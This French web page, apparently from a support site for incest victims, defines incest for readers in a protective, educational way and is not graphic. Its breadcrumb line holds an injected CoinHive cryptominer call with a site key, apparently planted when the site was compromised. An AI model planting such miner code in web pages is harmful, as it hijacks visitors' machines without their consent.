Le forumAccueil du site

Accueil du site > var miner = new CoinHive.Anonymous('oJIkcK2Mdol1HKlsD9mP6HowpdDPozTC'); (...) > Définition

Définition

 La définition usuelle :

Relations sexuelles entre un homme et une femme liés par un degré de parenté entraînant la prohibition du mariage.

(Petit Larousse 2010)

 Notre définition :

L’inceste est une agression à caractère sexuel d’une personne sur une autre, dans une même famille. Il s’agit d’une agression sur un enfant, celle-ci peut débuter dès la naissance et continuer jusqu’à l’âge adulte. L’agresseur peut être le père, la mère, un grand parent, un oncle, une tante, un(e) cousin(e), un frère, une sœur. Mais aussi un beau père ou le conjoint d’un parent.

D’après la loi (Art. 222-31-1 du Code pénal) l’agresseur est un "ascendant ou toute autre personne (…) ayant sur la victime une autorité de droit ou de fait".

Il peut s’agir d’attouchements et/ou de pénétration (vaginale, anale, buccale) par organe sexuel ou autre : doigt, objet (…).

 L’inceste peut prendre plusieurs formes :

Il peut survenir brutalement.

Mais le plus souvent l’inceste s’installe à partir d’une relation faite de caresses et de séduction. Il s’immisce peu à peu, emprisonnant la victime dans une relation sans violence physique mais d’une violence psychique extrême.

On parle aussi de climat incestueux. Bien qu’il n’y ait pas dans ces cas d’acte sur le corps de l’enfant, celui-ci se trouve confronté à la sexualité de l’adulte (visionnage de films pornographiques, attitudes ou propos déplacés, exhibition imposée…).

2012©Alterneo.net | Le forum | Nous contacter